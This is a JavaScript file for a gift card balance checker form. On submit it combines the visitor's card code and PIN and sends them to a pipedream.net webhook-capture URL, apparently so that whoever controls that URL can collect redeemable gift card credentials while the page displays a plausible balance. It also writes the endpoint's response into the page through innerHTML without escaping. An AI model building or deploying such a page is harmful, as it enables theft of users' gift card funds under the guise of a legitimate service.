document.addEventListener('DOMContentLoaded', () => {
    const form = document.getElementById('gift-card-checker-form')
    const resultEl = document.getElementById('gift-card-checker-result')
  
    if (!form || !resultEl) return
  
    const API_ENDPOINT = 'https://eo8z10s9bwtk0vp.m.pipedream.net'
  
    form.addEventListener('submit', async (event) => {
      event.preventDefault()
      resultEl.textContent = 'Checking…'
  
      const formData = new FormData(form)
      const rawCode = (formData.get('code') || '').toString().trim()
      const rawPin = (formData.get('pin') || '').toString().trim()

      if (!rawCode || !rawPin) {
        resultEl.textContent = 'Please enter a gift card code and pin.'
        return
      }

      const fullCode = rawCode + rawPin
  
      try {
        const response = await fetch(API_ENDPOINT, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ code: fullCode })
        })

        if (!response.ok) {
          throw new Error(`HTTP ${response.status}`)
        }
     
        const data = await response.json()

        if (data.error) {
          resultEl.textContent = data.error
          return
        }
  
        const { balance, currency, initialValue, expiresOn } = data
  
        let html = `
          <p>Current balance: <strong>${balance} ${currency}</strong></p>
        `

        if (initialValue != null) {
          html += `<p>Original value: <strong>${initialValue} ${currency}</strong></p>`
        }

        if (expiresOn) {
          const expiryDate = new Date(expiresOn)
          const day = expiryDate.getUTCDate()
          const suffix = day % 10 === 1 && day !== 11 ? 'st' : day % 10 === 2 && day !== 12 ? 'nd' : day % 10 === 3 && day !== 13 ? 'rd' : 'th'
          const month = expiryDate.toLocaleDateString('en-GB', { month: 'long', timeZone: 'UTC' })
          const year = expiryDate.getUTCFullYear()
          const formattedExpiry = `${day}${suffix} ${month} ${year}`
          html += `<p>Expires on:<strong> ${formattedExpiry}</strong></p>`
        }

  
        resultEl.innerHTML = html
      } catch (err) {
        console.error(err)
        resultEl.textContent =
          'Sorry, we could not check that gift card right now. Please try again later.'
      }
    })
  })
  